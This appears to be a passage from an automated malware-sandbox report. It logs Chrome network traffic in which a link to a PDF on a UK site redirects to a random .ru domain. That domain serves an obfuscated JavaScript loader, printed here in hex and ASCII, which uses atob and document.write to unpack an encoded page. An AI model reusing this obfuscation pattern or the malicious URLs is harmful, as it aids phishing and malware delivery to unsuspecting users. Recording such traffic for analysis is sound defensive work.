                                                      Data Raw: 30 82 05 6b 30 82 03 53 a0 03 02 01 02 02 11 00 82 10 cf b0 d2 40 e3 59 44 63 e0 bb 63 82 8b 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 1e 17 0d 31 35 30 36 30 34 31 31 30 34 33 38 5a 17 0d 33 35 30 36 30 34 31 31 30 34 33 38 5a 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ad e8 24 73 f4 14 37 f3 9b 9e 2b 57 28 1c 87 be dc b7 df 38 90 8c 6e 3c e6 57 a0 78 f7 75 c2 a2 fe f5 6a 6e f6 00 4f 28 db de 68 86 6c 44 93 b6 b1 63 fd 14 12 6b bf 1f d2 ea 31 9b 21 7e d1 33 [TRUNCATED]
                                                      Data Ascii: 0k0S@YDcc0*H0O10UUS1)0'U Internet Security Research Group10UISRG Root X10150604110438Z350604110438Z0O10UUS1)0'U Internet Security Research Group10UISRG Root X10"0*H0$s7+W(8n<WxujnO(hlDck1!~3<Hy!KqiJffl~<p)"K~G|H#S8Oo.IWt/8{p!u0<cOK~w.{JL%p)S$J?aQcq.o[\4ylv;by/&676urI*Av5/(ldwnG7Y^hrA)>Y>&$ZL@F:Qn;}rxY>Qx/>{JKsP|Ctt0[q600\H;}`)A|;FH*vvj=8d+(B"']ypN:'Qnd3COB0@0U0U00UyY{sXn0*HUXPi ')au
                                                      Mar 25, 2025 11:53:58.771677017 CET491INData Raw: 5c 8a 6e f8 82 e5 69 2f d5 f6 56 4b b9 b8 73 10 59 d3 21 97 7e e7 4c 71 fb b2 d2 60 ad 39 a8 0b ea 17 21 56 85 f1 50 0e 59 eb ce e0 59 e9 ba c9 15 ef 86 9d 8f 84 80 f6 e4 e9 91 90 dc 17 9b 62 1b 45 f0 66 95 d2 7c 6f c2 ea 3b ef 1f cf cb d6 ae 27
                                                      Data Ascii: \ni/VKsY!~Lq`9!VPYYbEf|o;'}~"+"4[XT&3L-<W,N;1"ss993#L<U)"k;W:pMMl]+NEJ&rj,_(.{q{


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1192.168.2.649698142.251.40.13180
                                                      TimestampBytes transferredDirectionData
                                                      Mar 25, 2025 11:54:01.375372887 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                      Cache-Control: max-age = 3000
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                      Host: c.pki.goog
                                                      Mar 25, 2025 11:54:01.466968060 CET223INHTTP/1.1 304 Not Modified
                                                      Date: Tue, 25 Mar 2025 10:29:48 GMT
                                                      Expires: Tue, 25 Mar 2025 11:19:48 GMT
                                                      Age: 1453
                                                      Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                      Cache-Control: public, max-age=3000
                                                      Vary: Accept-Encoding
                                                      Mar 25, 2025 11:54:01.471590996 CET200OUTGET /r/r4.crl HTTP/1.1
                                                      Cache-Control: max-age = 3000
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                      Host: c.pki.goog
                                                      Mar 25, 2025 11:54:01.562688112 CET223INHTTP/1.1 304 Not Modified
                                                      Date: Tue, 25 Mar 2025 10:20:24 GMT
                                                      Expires: Tue, 25 Mar 2025 11:10:24 GMT
                                                      Age: 2017
                                                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                      Cache-Control: public, max-age=3000
                                                      Vary: Accept-Encoding


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649711185.199.220.714431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:18 UTC685OUTGET /pad4.pdf HTTP/1.1
                                                      Host: sallybarmescounsellor.co.uk
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:18 UTC397INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 795
                                                      date: Tue, 25 Mar 2025 10:54:18 GMT
                                                      server: LiteSpeed
                                                      location: https://uZ5k.vsmaemhjvk.ru/vHFigT/
                                                      vary: User-Agent
                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                      2025-03-25 10:54:18 UTC795INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!importan


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.649712104.21.48.14431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:19 UTC675OUTGET /vHFigT/ HTTP/1.1
                                                      Host: uz5k.vsmaemhjvk.ru
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:19 UTC1207INHTTP/1.1 200 OK
                                                      Date: Tue, 25 Mar 2025 10:54:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, private
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PfCxneqBu6Kdh%2FF%2FxQL8jFg%2B9nkgq9yDcfEaL7hz8y498qG1V%2Bazqw8B89mmPquaZqZwtDypE8XNigC3t4xPvvpVSU3m%2FumwZ9wyWP3rHT8no4MC0aFP8DN30M6K"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=302&min_rtt=291&rtt_var=103&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1574&delivery_rate=11391549&cwnd=252&unsent_bytes=0&cid=7fd089d0c961c24d&ts=257&x=0"
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InI5VHgxa1VVVG00aVJPRXdVTk1LSnc9PSIsInZhbHVlIjoiS3g3V0hyMFBhRlVHVmV2MThlWHM0ZVhRK2Nway9JQ1kzN094RWU2TllQbTZCMEFyYlZFWUJPLzgyNDRaZEV4QURRUkNydDJIUHRDaUdWUnBlSmNzbSs5WEdBOUgyVEF2VjdGVlF3QXBqZmNoT0lWaVNHamd5YXVQKzJHMzVPRTkiLCJtYWMiOiJlZWRjMjMzZTMzNTMyYzUxMDI4MDc0ZTMwYjZjYjQ0NWQyNmI0MTQ3YmVhOTFiN2MzY2E4OWQ0OWE2OTU4OTg0IiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 12:54:19 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      2025-03-25 10:54:19 UTC764INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 42 56 4e 30 73 79 4d 45 6c 43 4f 47 4e 77 4d 30 35 35 4e 6a 49 35 57 54 5a 4a 4c 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 54 45 77 53 79 74 6e 59 6d 64 42 64 6e 5a 32 5a 54 46 56 55 45 5a 69 63 55 55 76 63 32 31 46 55 6e 4e 61 64 32 5a 6b 65 47 4a 5a 61 46 68 56 65 6d 35 59 5a 56 4e 30 57 6d 30 31 63 57 6c 4c 63 6b 46 5a 54 57 64 7a 64 46 5a 78 62 31 5a 78 4e 45 70 48 59 31 68 58 4d 33 4a 47 62 44 52 79 5a 30 35 4a 54 31 56 56 51 6c 5a 75 55 6d 4a 4f 62 54 4a 46 56 31 49 30 64 30 55 77 53 6b 31 33 5a 30 35 4d 59 6d 52 35 55 30 70 73 61 57 4a 31 61 48 4a 50 63 31 4a 44 65 54 46 44 64 6a 63 76 4e 6a 4e 73 55 56 70 4c 55 30 59
                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InBVN0syMElCOGNwM055NjI5WTZJL3c9PSIsInZhbHVlIjoiSTEwSytnYmdBdnZ2ZTFVUEZicUUvc21FUnNad2ZkeGJZaFhVem5YZVN0Wm01cWlLckFZTWdzdFZxb1ZxNEpHY1hXM3JGbDRyZ05JT1VVQlZuUmJObTJFV1I0d0UwSk13Z05MYmR5U0psaWJ1aHJPc1JDeTFDdjcvNjNsUVpLU0Y
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 6b 73 70 67 77 61 54 4c 43 4e 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 50 62 31 6c 4a 4c 6e 5a 7a 62 57 46 6c 62 57 68 71 64 6d 73 75 63 6e 55 76 64 6b 68 47 61 57 64 55 4c 77 3d 3d 22 29 3b 0a 43 57 5a 45 72 66 46 67 67 72 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 42 6d 6e 6e 70 53 56 61 6f 72 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 6b 73 70 67 77 61 54 4c 43 4e 20 3d 3d 20 43 57 5a 45 72 66 46 67 67 72 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 42 6d 6e 6e 70 53 56 61 6f 72 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b
                                                      Data Ascii: 7ff9<script>kspgwaTLCN = atob("aHR0cHM6Ly9Pb1lJLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");CWZErfFggr = atob("bm9tYXRjaA==");BmnnpSVaor = atob("d3JpdGU=");if(kspgwaTLCN == CWZErfFggr){document[BmnnpSVaor](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f
                                                      Data Ascii: OFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++o
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f
                                                      Data Ascii: +oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
                                                      Data Ascii: pOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oO+
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b
                                                      Data Ascii: O++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                                      Data Ascii: ++oOOFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++o
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f
                                                      Data Ascii: FpO++oOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpO++oO
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f
                                                      Data Ascii: pOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOO
                                                      2025-03-25 10:54:19 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b
                                                      Data Ascii: O++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.649709142.250.80.1004431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
